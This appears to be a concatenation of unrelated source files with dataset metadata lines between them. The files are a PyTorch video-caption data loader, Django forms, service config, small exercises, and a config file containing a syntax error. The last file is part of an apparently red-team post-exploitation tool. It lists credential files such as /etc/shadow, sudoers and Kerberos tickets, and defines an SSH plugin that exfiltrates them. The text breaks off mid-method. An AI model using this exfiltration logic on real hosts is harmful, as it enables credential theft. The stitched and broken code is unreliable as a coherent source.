with open(caption_file_source2, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions_source2[cap_id] = caption self.cap_ids_source2.append(cap_id) self.bow2vec = bow2vec self.vocab = vocab self.length = len(self.cap_ids) # self.cap_ids_target = self.cap_ids_target * 2 print(self.length) print(len(self.cap_ids_target)) # if n_caption is not None: # assert len(self.video_ids) * n_caption == self.length, "%d != %d" % (len(self.video_ids) * n_caption, self.length) def __getitem__(self, index): cap_id = self.cap_ids[index] video_id = getVideoId(cap_id) frame_list = self.video2frames[video_id] frame_vecs = [] for frame_id in frame_list: frame_vecs.append(self.visual_feat.read_one(frame_id)) frames_tensor = torch.Tensor(frame_vecs) caption = self.captions[cap_id] if self.bow2vec is not None: cap_bow = self.bow2vec.mapping(caption) if cap_bow is None: cap_bow = torch.zeros(self.bow2vec.ndims) else: cap_bow = torch.Tensor(cap_bow) else: cap_bow = None if self.vocab is not None: tokens = clean_str(caption) caption = [] caption.append(self.vocab('<start>')) caption.extend([self.vocab(token) for token in tokens]) caption.append(self.vocab('<end>')) cap_tensor = torch.Tensor(caption) else: cap_tensor = None if self.visual_feat_target != None and self.video2frames_target != None: cap_id_target = self.cap_ids_target[index] video_id_target = getVideoId(cap_id_target) frame_list = self.video2frames_target[video_id_target] frame_vecs_target = [] for frame_id in frame_list: frame_vecs_target.append(self.visual_feat_target.read_one(frame_id)) frames_tensor_target = torch.Tensor(frame_vecs_target) caption_target = self.captions_target[cap_id_target] # caption_target = self.cap_ids_target[index] # video_id_target = 'a' # frame_list = self.video2frames_target[self.target_video_id_list[index]] # frame_vecs_target = [] # for frame_id in frame_list: # frame_vecs_target.append(self.visual_feat_target.read_one(frame_id)) # frames_tensor_target = torch.Tensor(frame_vecs_target) if self.bow2vec is not None: cap_bow_target = self.bow2vec.mapping(caption_target) if cap_bow_target is None: cap_bow_target = torch.zeros(self.bow2vec.ndims) else: cap_bow_target = torch.Tensor(cap_bow_target) else: cap_bow_target = None if self.vocab is not None: tokens = clean_str(caption_target) caption_target = [] caption_target.append(self.vocab('<start>')) caption_target.extend([self.vocab(token) for token in tokens]) caption_target.append(self.vocab('<end>')) cap_tensor_target = torch.Tensor(caption_target) else: cap_tensor_target = None if self.visual_feat_source2 != None and self.video2frames_source2 != None: cap_id_source2 = self.cap_ids_source2[index] video_id_source2 = getVideoId(cap_id_source2) frame_list = self.video2frames_source2[video_id_source2] frame_vecs_source2 = [] for frame_id in frame_list: frame_vecs_source2.append(self.visual_feat_source2.read_one(frame_id)) frames_tensor_source2 = torch.Tensor(frame_vecs_source2) caption_source2 = self.captions_source2[cap_id_source2] # caption_source2 = self.cap_ids_source2[index] # video_id_source2 = 'a' # frame_list = self.video2frames_source2[self.source2_video_id_list[index]] # frame_vecs_source2 = [] # for frame_id in frame_list: # frame_vecs_source2.append(self.visual_feat_source2.read_one(frame_id)) # frames_tensor_source2 = torch.Tensor(frame_vecs_source2) if self.bow2vec is not None: cap_bow_source2 = self.bow2vec.mapping(caption_source2) if cap_bow_source2 is None: cap_bow_source2 = torch.zeros(self.bow2vec.ndims) else: cap_bow_source2 = torch.Tensor(cap_bow_source2) else: cap_bow_source2 = None if self.vocab is not None: tokens = clean_str(caption_source2) caption_source2 = [] caption_source2.append(self.vocab('<start>')) caption_source2.extend([self.vocab(token) for token in tokens]) caption_source2.append(self.vocab('<end>')) cap_tensor_source2 = torch.Tensor(caption_source2) else: cap_tensor_source2 = None return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id, frames_tensor_target, video_id_target, cap_tensor_target, cap_bow_target, frames_tensor_source2, video_id_source2, cap_tensor_source2, cap_bow_source2 else: return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id, frames_tensor_target, video_id_target, cap_tensor_target, cap_bow_target else: return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id def __len__(self): return self.length class VisDataSet4DualEncoding(data.Dataset): """ Load video frame features by pre-trained CNN model. """ def __init__(self, visual_feat, video2frames=None): self.visual_feat = visual_feat self.video2frames = video2frames self.video_ids = video2frames.keys() self.length = len(self.video_ids) def __getitem__(self, index): video_id = self.video_ids[index] frame_list = self.video2frames[video_id] frame_vecs = [] for frame_id in frame_list: frame_vecs.append(self.visual_feat.read_one(frame_id)) frames_tensor = torch.Tensor(frame_vecs) return frames_tensor, index, video_id def __len__(self): return self.length class TxtDataSet4DualEncoding(data.Dataset): """ Load captions """ def __init__(self, cap_file, bow2vec, vocab): # Captions self.captions = {} self.cap_ids = [] with open(cap_file, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions[cap_id] = caption self.cap_ids.append(cap_id) self.bow2vec = bow2vec self.vocab = vocab self.length = len(self.cap_ids) def __getitem__(self, index): cap_id = self.cap_ids[index] caption = self.captions[cap_id] if self.bow2vec is not None: cap_bow = self.bow2vec.mapping(caption) if cap_bow is None: cap_bow = torch.zeros(self.bow2vec.ndims) else: cap_bow = torch.Tensor(cap_bow) else: cap_bow = None if self.vocab is not None: tokens = clean_str(caption) caption = [] caption.append(self.vocab('<start>')) caption.extend([self.vocab(token) for token in tokens]) caption.append(self.vocab('<end>')) cap_tensor = torch.Tensor(caption) else: cap_tensor = None return cap_tensor, cap_bow, index, cap_id def __len__(self): return self.length def get_data_loaders(cap_files, visual_feats, vocab, bow2vec, batch_size=100, num_workers=2, n_caption=2, video2frames=None, video2frames_target=None, visual_feats_target=None, caption_file_target=None, multi_flag=0): """ Returns torch.utils.data.DataLoader for train and validation datasets Args: cap_files: caption files (dict) keys: [train, val] visual_feats: image feats (dict) keys: [train, val] """ if video2frames_target!=None and visual_feats_target!=None: if multi_flag == 0: dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train'], video2frames_target=video2frames_target['train'], visual_feat_target=visual_feats_target['train'], caption_file_target=caption_file_target), 'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']), 'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames=video2frames['test'])} else: dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train'], video2frames_target=video2frames_target['train'], visual_feat_target=visual_feats_target['train'], caption_file_target=caption_file_target, visual_feat_source2=visual_feats['train2'], video2frames_source2=video2frames['train2'], caption_file_source2=cap_files['train2']), 'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']), 'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames=video2frames['test'])} else: dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train']), 'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']), 'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames=video2frames['test'])} data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x], batch_size=batch_size, shuffle=(x=='train'), pin_memory=True, num_workers=num_workers, collate_fn=collate_frame_gru_fn) for x in ['train', 'val', 'test']} return data_loaders def get_test_data_loaders(cap_files, visual_feats, vocab, bow2vec, batch_size=100, num_workers=2, n_caption=2, video2frames = None): """ Returns torch.utils.data.DataLoader for test dataset Args: cap_files: caption files (dict) keys: [test] visual_feats: image feats (dict) keys: [test] """ dset = {'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames = video2frames['test'])} data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x], batch_size=batch_size, shuffle=False, pin_memory=True, num_workers=num_workers, collate_fn=collate_frame_gru_fn) for x in cap_files } return data_loaders def get_vis_data_loader(vis_feat, batch_size=100, num_workers=2, video2frames=None): dset = VisDataSet4DualEncoding(vis_feat, video2frames) data_loader = torch.utils.data.DataLoader(dataset=dset, batch_size=batch_size, shuffle=False, pin_memory=True, num_workers=num_workers, collate_fn=collate_frame) return data_loader def get_txt_data_loader(cap_file, vocab, bow2vec, batch_size=100, num_workers=2): dset = TxtDataSet4DualEncoding(cap_file, bow2vec, vocab) data_loader = torch.utils.data.DataLoader(dataset=dset, batch_size=batch_size, shuffle=False, pin_memory=True, num_workers=num_workers, collate_fn=collate_text) return data_loader if __name__ == '__main__': pass
en
0.470059
Build mini-batch tensors from a list of (video, caption) tuples. # Sort a data list by caption length # Merge videos (convert tuple of 1D tensor to 4D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) # Merge videos (convert tuple of 1D tensor to 4D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) # Merge videos (convert tuple of 1D tensor to 4D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) # Merge videos (convert tuple of 1D tensor to 4D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) Load captions and video frame features by pre-trained CNN model. # Captions # self.cap_ids_target = self.cap_ids_target * 2 # if n_caption is not None: # assert len(self.video_ids) * n_caption == self.length, "%d != %d" % (len(self.video_ids) * n_caption, self.length) # caption_target = self.cap_ids_target[index] # video_id_target = 'a' # frame_list = self.video2frames_target[self.target_video_id_list[index]] # frame_vecs_target = [] # for frame_id in frame_list: # frame_vecs_target.append(self.visual_feat_target.read_one(frame_id)) # frames_tensor_target = torch.Tensor(frame_vecs_target) # caption_source2 = self.cap_ids_source2[index] # video_id_source2 = 'a' # frame_list = self.video2frames_source2[self.source2_video_id_list[index]] # frame_vecs_source2 = [] # for frame_id in frame_list: # frame_vecs_source2.append(self.visual_feat_source2.read_one(frame_id)) # frames_tensor_source2 = torch.Tensor(frame_vecs_source2) Load video frame features by pre-trained CNN model. Load captions # Captions Returns torch.utils.data.DataLoader for train and validation datasets Args: cap_files: caption files (dict) keys: [train, val] visual_feats: image feats (dict) keys: [train, val] Returns torch.utils.data.DataLoader for test dataset Args: cap_files: caption files (dict) keys: [test] visual_feats: image feats (dict) keys: [test]
2.608207
3
accounts/forms.py
morenoh149/djangox-autocomplete-light
1
6618598
<reponame>morenoh149/djangox-autocomplete-light from django import forms from django.contrib.auth.forms import UserCreationForm, UserChangeForm from .models import CustomUser from dal import autocomplete class CustomUserCreationForm(UserCreationForm): class Meta(UserCreationForm.Meta): model = CustomUser fields = ('email', 'username',) class CustomUserChangeForm(UserChangeForm): class Meta: model = CustomUser fields = ('email', 'username',) class PersonForm(forms.ModelForm): email = forms.ModelChoiceField( queryset=CustomUser.objects.all(), widget=autocomplete.ModelSelect2(url='custom-user-autocomplete') ) class Meta: model = CustomUser fields = ('email', 'username')
from django import forms from django.contrib.auth.forms import UserCreationForm, UserChangeForm from .models import CustomUser from dal import autocomplete class CustomUserCreationForm(UserCreationForm): class Meta(UserCreationForm.Meta): model = CustomUser fields = ('email', 'username',) class CustomUserChangeForm(UserChangeForm): class Meta: model = CustomUser fields = ('email', 'username',) class PersonForm(forms.ModelForm): email = forms.ModelChoiceField( queryset=CustomUser.objects.all(), widget=autocomplete.ModelSelect2(url='custom-user-autocomplete') ) class Meta: model = CustomUser fields = ('email', 'username')
none
1
2.312284
2
brick_server/minimal/dbs.py
BrickSchema/brick-example-server
3
6618599
<reponame>BrickSchema/brick-example-server<gh_stars>1-10 from fastapi_rest_framework.config import settings from mongoengine import connect as mongo_connect from brick_server.minimal.interfaces import AsyncpgTimeseries, RealActuation from brick_server.minimal.interfaces.grafana import GrafanaEndpoint from brick_server.minimal.interfaces.graphdb import GraphDB mongo_connection = mongo_connect( host=settings.mongo_host, port=settings.mongo_port, username=settings.mongo_username, password=<PASSWORD>, db=settings.mongo_dbname, connect=False, ) actuation_iface = RealActuation() # brick_configs = configs["brick"] brick_url = ( f"http://{settings.brick_host}:{settings.brick_port}/{settings.brick_api_endpoint}" ) # brick_sparql = BrickSparqlAsync( # brick_url, # settings.brick_version, # graph=settings.brick_base_graph, # base_ns=settings.brick_base_ns, # ) # # brick_sparql_sync = BrickSparql( # brick_url, # settings.brick_version, # graph=settings.brick_base_graph, # base_ns=settings.brick_base_ns, # ) graphdb = GraphDB( host=settings.graphdb_host, port=settings.graphdb_port, repository=settings.graphdb_repository, ) # brick_ts_configs = configs["timeseries"] ts_db = AsyncpgTimeseries( settings.timescale_dbname, settings.timescale_username, settings.timescale_password, settings.timescale_host, settings.timescale_port, ) grafana_url = f"http://{settings.grafana_host}:{settings.grafana_port}/{settings.grafana_api_endpoint}" grafana_endpoint = GrafanaEndpoint(grafana_url, settings.grafana_api_key)
from fastapi_rest_framework.config import settings from mongoengine import connect as mongo_connect from brick_server.minimal.interfaces import AsyncpgTimeseries, RealActuation from brick_server.minimal.interfaces.grafana import GrafanaEndpoint from brick_server.minimal.interfaces.graphdb import GraphDB mongo_connection = mongo_connect( host=settings.mongo_host, port=settings.mongo_port, username=settings.mongo_username, password=<PASSWORD>, db=settings.mongo_dbname, connect=False, ) actuation_iface = RealActuation() # brick_configs = configs["brick"] brick_url = ( f"http://{settings.brick_host}:{settings.brick_port}/{settings.brick_api_endpoint}" ) # brick_sparql = BrickSparqlAsync( # brick_url, # settings.brick_version, # graph=settings.brick_base_graph, # base_ns=settings.brick_base_ns, # ) # # brick_sparql_sync = BrickSparql( # brick_url, # settings.brick_version, # graph=settings.brick_base_graph, # base_ns=settings.brick_base_ns, # ) graphdb = GraphDB( host=settings.graphdb_host, port=settings.graphdb_port, repository=settings.graphdb_repository, ) # brick_ts_configs = configs["timeseries"] ts_db = AsyncpgTimeseries( settings.timescale_dbname, settings.timescale_username, settings.timescale_password, settings.timescale_host, settings.timescale_port, ) grafana_url = f"http://{settings.grafana_host}:{settings.grafana_port}/{settings.grafana_api_endpoint}" grafana_endpoint = GrafanaEndpoint(grafana_url, settings.grafana_api_key)
en
0.363709
# brick_configs = configs["brick"] # brick_sparql = BrickSparqlAsync( # brick_url, # settings.brick_version, # graph=settings.brick_base_graph, # base_ns=settings.brick_base_ns, # ) # # brick_sparql_sync = BrickSparql( # brick_url, # settings.brick_version, # graph=settings.brick_base_graph, # base_ns=settings.brick_base_ns, # ) # brick_ts_configs = configs["timeseries"]
2.0593
2
eventpy/internal/lockguard.py
wqking/eventpy
19
6618600
<gh_stars>10-100 # eventpy library # Copyright (C) 2020 <NAME> (wqking) # Github: https://github.com/wqking/eventpy # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. class LockGuard : def __init__(self, lock) : self._lock = lock def __enter__(self) : self.lock() return self def __exit__(self, type, value, traceBack) : self.unlock() def lock(self) : self._lock.acquire() def unlock(self) : self._lock.release()
# eventpy library # Copyright (C) 2020 <NAME> (wqking) # Github: https://github.com/wqking/eventpy # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. class LockGuard : def __init__(self, lock) : self._lock = lock def __enter__(self) : self.lock() return self def __exit__(self, type, value, traceBack) : self.unlock() def lock(self) : self._lock.acquire() def unlock(self) : self._lock.release()
en
0.842423
# eventpy library # Copyright (C) 2020 <NAME> (wqking) # Github: https://github.com/wqking/eventpy # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.
1.755205
2
docs/examples/yuv_capture4.py
simonyangme/picamera
1,311
6618601
<gh_stars>1000+ import time import picamera import picamera.array import numpy as np with picamera.PiCamera() as camera: camera.resolution = (100, 100) time.sleep(2) y_data = np.empty((112, 128), dtype=np.uint8) try: camera.capture(y_data, 'yuv') except IOError: pass y_data = y_data[:100, :100] # y_data now contains the Y-plane only
import time import picamera import picamera.array import numpy as np with picamera.PiCamera() as camera: camera.resolution = (100, 100) time.sleep(2) y_data = np.empty((112, 128), dtype=np.uint8) try: camera.capture(y_data, 'yuv') except IOError: pass y_data = y_data[:100, :100] # y_data now contains the Y-plane only
en
0.638033
# y_data now contains the Y-plane only
2.817482
3
URI1037.py
rashidulhasanhridoy/URI-Online-Judge-Problem-Solve-with-Python-3
2
6618602
<gh_stars>1-10 A = float(input('')) if A >= 0 and A <= 25: print('Intervalo [0,25]') elif A > 25 and A <= 50: print('Intervalo (25,50]') elif A > 50 and A <= 75: print('Intervalo (50,75]') elif A > 75 and A <= 100: print('Intervalo (75,100]') else: print('Fora de intervalo')
A = float(input('')) if A >= 0 and A <= 25: print('Intervalo [0,25]') elif A > 25 and A <= 50: print('Intervalo (25,50]') elif A > 50 and A <= 75: print('Intervalo (50,75]') elif A > 75 and A <= 100: print('Intervalo (75,100]') else: print('Fora de intervalo')
none
1
3.887084
4
test/__init__.py
marcintustin/xnmt
0
6618603
<reponame>marcintustin/xnmt<filename>test/__init__.py import dynet_config dynet_config.set(random_seed=2)
import dynet_config dynet_config.set(random_seed=2)
none
1
1.219629
1
src/pytorch-project/config/config_init.py
kaderghal/ADNI_Data_processing
5
6618604
<filename>src/pytorch-project/config/config_init.py #!/usr/bin/python3 # ==================================================== # Author: <NAME> # Year: 2019 # Labs: LaBRI & LabSIV # for ADNI Dataset : ADNI-1 baseline SMRI # screening selected dataset # URL: http://adni.loni.usc.edu/ # ==================================================== #------------------------------------------------------------------------------------------ # Debuging & Time Zone #------------------------------------------------------------------------------------------ DEBUG = False TIMEZONE = 'France/Bordeaux' #------------------------------------------------------------------------------------------ # Author Informations #------------------------------------------------------------------------------------------ AUTHOR_INFO = { 'author': '<NAME>', 'name': 'ALZ-ADNI PCS', 'version': '1.2', 'year': '2019', 'description': 'Data Extracting scripts for CNN Alzheimer\'s Disease Classification', 'url': 'http://github.com/kaderghal', 'email': '<EMAIL>', 'university': 'Université de Bordeaux (Bordeaux)/ University IBN Zohr (Agadir)', 'lab': 'LaBRI & LabSIV' } #------------------------------------------------------------------------------------------ # Root path to local workspace (local Machine) #------------------------------------------------------------------------------------------ ROOT_PATH_LOCAL_MACHINE = { 'root_machine': '/home/karim/workspace/ADNI_workspace' } #------------------------------------------------------------------------------------------ # Root path to local workspace (local Machine) #------------------------------------------------------------------------------------------ ROOT_PATH_LOCAL_MACHINE = { 'root_machine': '/home/karim/workspace/ADNI_workspace' } #------------------------------------------------------------------------------------------ # Global parameters: # -> Path to the used Deep learning Framework # -> Path to the output resutls #------------------------------------------------------------------------------------------ GLOBAL_PARAMS = { 'pytorch_root': ROOT_PATH_LOCAL_MACHINE['root_machine'] + '/path/to/pythorch/', 'adni_data_src': ROOT_PATH_LOCAL_MACHINE['root_machine'] + '/results/ADNI_src/', 'adni_data_des': ROOT_PATH_LOCAL_MACHINE['root_machine'] + '/results/ADNI_des/' } training_dir = "./data/faces/training/" testing_dir = "./data/faces/testing/" train_batch_size = 64 train_number_epochs = 100 NETWORK_PARAMS = { 'train_folder' : GLOBAL_PARAMS['adni_data_des'] + '', 'valid_folder' :, 'test_folder' : }
<filename>src/pytorch-project/config/config_init.py #!/usr/bin/python3 # ==================================================== # Author: <NAME> # Year: 2019 # Labs: LaBRI & LabSIV # for ADNI Dataset : ADNI-1 baseline SMRI # screening selected dataset # URL: http://adni.loni.usc.edu/ # ==================================================== #------------------------------------------------------------------------------------------ # Debuging & Time Zone #------------------------------------------------------------------------------------------ DEBUG = False TIMEZONE = 'France/Bordeaux' #------------------------------------------------------------------------------------------ # Author Informations #------------------------------------------------------------------------------------------ AUTHOR_INFO = { 'author': '<NAME>', 'name': 'ALZ-ADNI PCS', 'version': '1.2', 'year': '2019', 'description': 'Data Extracting scripts for CNN Alzheimer\'s Disease Classification', 'url': 'http://github.com/kaderghal', 'email': '<EMAIL>', 'university': 'Université de Bordeaux (Bordeaux)/ University IBN Zohr (Agadir)', 'lab': 'LaBRI & LabSIV' } #------------------------------------------------------------------------------------------ # Root path to local workspace (local Machine) #------------------------------------------------------------------------------------------ ROOT_PATH_LOCAL_MACHINE = { 'root_machine': '/home/karim/workspace/ADNI_workspace' } #------------------------------------------------------------------------------------------ # Root path to local workspace (local Machine) #------------------------------------------------------------------------------------------ ROOT_PATH_LOCAL_MACHINE = { 'root_machine': '/home/karim/workspace/ADNI_workspace' } #------------------------------------------------------------------------------------------ # Global parameters: # -> Path to the used Deep learning Framework # -> Path to the output resutls #------------------------------------------------------------------------------------------ GLOBAL_PARAMS = { 'pytorch_root': ROOT_PATH_LOCAL_MACHINE['root_machine'] + '/path/to/pythorch/', 'adni_data_src': ROOT_PATH_LOCAL_MACHINE['root_machine'] + '/results/ADNI_src/', 'adni_data_des': ROOT_PATH_LOCAL_MACHINE['root_machine'] + '/results/ADNI_des/' } training_dir = "./data/faces/training/" testing_dir = "./data/faces/testing/" train_batch_size = 64 train_number_epochs = 100 NETWORK_PARAMS = { 'train_folder' : GLOBAL_PARAMS['adni_data_des'] + '', 'valid_folder' :, 'test_folder' : }
en
0.17756
#!/usr/bin/python3 # ==================================================== # Author: <NAME> # Year: 2019 # Labs: LaBRI & LabSIV # for ADNI Dataset : ADNI-1 baseline SMRI # screening selected dataset # URL: http://adni.loni.usc.edu/ # ==================================================== #------------------------------------------------------------------------------------------ # Debuging & Time Zone #------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------ # Author Informations #------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------ # Root path to local workspace (local Machine) #------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------ # Root path to local workspace (local Machine) #------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------ # Global parameters: # -> Path to the used Deep learning Framework # -> Path to the output resutls #------------------------------------------------------------------------------------------
1.701292
2
2020/examples-in-class-2020-11-26/run_course4.py
ati-ozgur/course-python
1
6618605
from course4 import Course,Student c1 = Course("Programming in Python","Atilla Özgür") c1.add_lesson_time("Thursday","11:15") c1.add_lesson_time("Thursday","12:45") c1.print_lesson_times() s1 = Student("Yousuf","Farooq","23342432") c1.add_student(s1) c1.print_student_list()
from course4 import Course,Student c1 = Course("Programming in Python","Atilla Özgür") c1.add_lesson_time("Thursday","11:15") c1.add_lesson_time("Thursday","12:45") c1.print_lesson_times() s1 = Student("Yousuf","Farooq","23342432") c1.add_student(s1) c1.print_student_list()
none
1
3.297075
3
leetcode/hard/Longest_Consecutive_Sequence.py
shhuan/algorithms
0
6618606
<gh_stars>0 # -*- coding: utf-8 -*- """ Given an unsorted array of integers, find the length of the longest consecutive elements sequence. For example, Given [100, 4, 200, 1, 3, 2], The longest consecutive elements sequence is [1, 2, 3, 4]. Return its length: 4. Your algorithm should run in O(n) complexity. """ __author__ = 'huash' import sys import os import collections import math import itertools class Solution: # @param {integer[]} nums # @return {integer} def longestConsecutive(self, nums): if not nums: return 0 nums = set(nums) maxLen = 0 while nums: num = nums.pop() count = 1 r = num + 1 while r in nums: count += 1 nums.remove(r) r += 1 l = num - 1 while l in nums: count += 1 nums.remove(l) l -= 1 maxLen = max(maxLen, count) return maxLen s = Solution() print(s.longestConsecutive([100, 4, 200, 1, 3, 2]))
# -*- coding: utf-8 -*- """ Given an unsorted array of integers, find the length of the longest consecutive elements sequence. For example, Given [100, 4, 200, 1, 3, 2], The longest consecutive elements sequence is [1, 2, 3, 4]. Return its length: 4. Your algorithm should run in O(n) complexity. """ __author__ = 'huash' import sys import os import collections import math import itertools class Solution: # @param {integer[]} nums # @return {integer} def longestConsecutive(self, nums): if not nums: return 0 nums = set(nums) maxLen = 0 while nums: num = nums.pop() count = 1 r = num + 1 while r in nums: count += 1 nums.remove(r) r += 1 l = num - 1 while l in nums: count += 1 nums.remove(l) l -= 1 maxLen = max(maxLen, count) return maxLen s = Solution() print(s.longestConsecutive([100, 4, 200, 1, 3, 2]))
en
0.761564
# -*- coding: utf-8 -*- Given an unsorted array of integers, find the length of the longest consecutive elements sequence. For example, Given [100, 4, 200, 1, 3, 2], The longest consecutive elements sequence is [1, 2, 3, 4]. Return its length: 4. Your algorithm should run in O(n) complexity. # @param {integer[]} nums # @return {integer}
3.8283
4
flag_slurper/autolib/post.py
Mab879/flag-slurper
4
6618607
""" Tasks to do after checking/retrieving flags. These functions **MUST NOT** bubble exceptions. A post task failing does not mean the protocol has failed, just any of the fun stuff you want to do afterwards. Things that belong here: - grabbing fun (non-flag) files - spawning reverse shells Things that don't belong here: - grabbing flags """ import logging import os from abc import ABC, abstractmethod from collections import deque from typing import Tuple, Type, Dict, List, Iterable import paramiko from schema import Schema, Optional from flag_slurper.autolib import Service from .exploit import get_directory, get_file, run_command, run_sudo, expand_wildcard from .models import Credential, File, ShadowEntry logger = logging.getLogger(__name__) #: Sensitive files to find on systems. Paths #: ending in / are directories. SENSITIVE_FILES = [ # Authentication '/etc/passwd', '/etc/shadow', '/etc/sudoers', '/etc/sudoers.d/', # Kerberos '/tmp/krb*', '/etc/krb*', '/etc/sssd/', # Cron '/etc/crontab', '/etc/cron.d/', '/etc/cron.daily/', '/etc/cron.hourly/', '/etc/cron.monthly/', '/etc/cron.weekly/', # Shell configs and profiles '/etc/skel/', '/etc/**/.bashrc', '/etc/**/.bash_profile', '/etc/**/.zshrc', '/etc/**/.profile' ] class PostContext(dict): """ A wrapper method for passing post pwn methods arbitrary data. This allows pwn functions to pass whatever arbitrary data they need onto the post plugins in an extensible way. """ def validate(self, schema: dict) -> 'PostContext': """ Allow a plugin to enforce their own schema for their context data. The ``Schema`` object is created by the context, not the plugin. :param schema: A dictionary containing the schema :return: Returns the context for chaining """ Schema(schema, ignore_extra_keys=True).validate(self) return self class PostPlugin(ABC): """ Defines a post pwn plugin. Plugins are configured in the ``post`` key to a project. For example: .. code-block:: yaml --- _version: "0.1" ... post: - service: WWW SSH commands: - <post plugin name>: <arguments> """ name = None schema = None context_schema = None config = None depends_on = [] def configure(self, config: dict) -> dict: """ Configure the plugin. This provides the base configuration implementation. It simply just validates the schema against the given config. Plugins that need more involved configuration may override this method. Plugins must define their own schema by overriding the ``schema`` class variable. :param config: :return: """ if not self.schema: raise ValueError('The schema for {} has not been configured'.format(self.name)) config = Schema(self.schema).validate(config) self.config = config logger.info('Configuring plugin: %s', self.config) return config def unconfigure(self): """ Remove any previous configuration. This is used between post exploits. """ self.config = None @abstractmethod def run(self, service: Service, context: PostContext) -> bool: """ Run the post pwn plugin. This is where the plugin will perform any actions it needs. All run methods MUST call their super before accessing the given context, otherwise it must attempt to safely access context entries. :param service: The service we are currently attacking :param context: The context given to the post plugin :returns: True if successful, False otherwise :raises ValueError: if the context schema has not been set """ if self.context_schema is None: raise ValueError('The context_schema for {} has not been configured'.format(self.name)) context.validate(self.context_schema) return True @abstractmethod def predicate(self, service: Service, context: PostContext) -> bool: """ Determines whether the plugin should be run for the given service, context, and configuration. The plugin's configuration will have been validated at this point. :param service: The current service to test against :param context: The current post context :return: True if this plugin should run, False otherwise """ raise NotImplementedError class PluginRegistry: """ The post pwn plugin registry. This handles configuring and figuring out which plugins will need to be run. """ def __init__(self): self.registry: Dict[str, PostPlugin] = {} def register(self, plugin: Type[PostPlugin]): """ Register a plugin with the plugin registry. :param plugin: The plugin class to register. :raises ValueError: If the plugin does not subclass :py:class:`PostPlugin`. :raises ValueError: If the plugin name is already taken. """ if not issubclass(plugin, PostPlugin): raise ValueError('Plugins must extend PostPlugin') if plugin.name in self.registry: raise ValueError('Plugin already registered by this name: {}'.format(plugin.name)) self.registry[plugin.name] = plugin() # The plugins that will be used for the current run self.run_plugins = [] def configure(self, config: List[dict]): """ Configure the plugins that will be used for this run. This will accept the ``commands`` section for the current service. :param config: The post config for the current service. :raises KeyError: When a command is specified that doesn't exist. :raises ValueError: When more than one key in a command entry. :raises ValueError: When a command uses an unknown plugin. """ # Unconfigure all plugins from a previous run list(map(PostPlugin.unconfigure, self.registry.values())) self.run_plugins = [] # Configure used plugins for for command in config: if len(command.keys()) != 1: raise ValueError('Each commands entry should have exactly one key') name = list(command.keys())[0] if name not in self.registry: raise KeyError('Unknown plugin: {}'.format(name)) plugin = self.registry[name] plugin.configure(command[name]) self.run_plugins.append(name) def post(self, service: Service, context: PostContext) -> bool: """ Runs applicable post pwn plugins against the given service, with the given context. :param service: The service to post pwn :param context: The context for the server :return: Whether all post invocation were successful """ results = [plugin.run(service, context) for plugin in self.registry.values() if plugin.name in self.run_plugins or plugin.predicate(service, context)] return all(results) class SSHFileExfil(PostPlugin): """ The ``ssh_exfil`` plugin attempt to find as many ``SENSITIVE_FILES`` as possible. This plugin takes some optional parameters: ``files``: List[str] A list of files to look for. All entries ending with a ``/`` are considered directories and will be searched. ``merge_files``: Boolean Set to ``True`` if you want to merge ``files`` with ``SENSITIVE_FILES``, otherwise only ``files`` will be searched. This plugin will run automatically for all services using port 22. """ name = 'ssh_exfil' schema = { Optional('files', default=[]): [str], Optional('merge_files', default=True): bool, } context_schema = { 'ssh': paramiko.SSHClient, 'credentials': object, } def run(self, service: Service, context: PostContext): 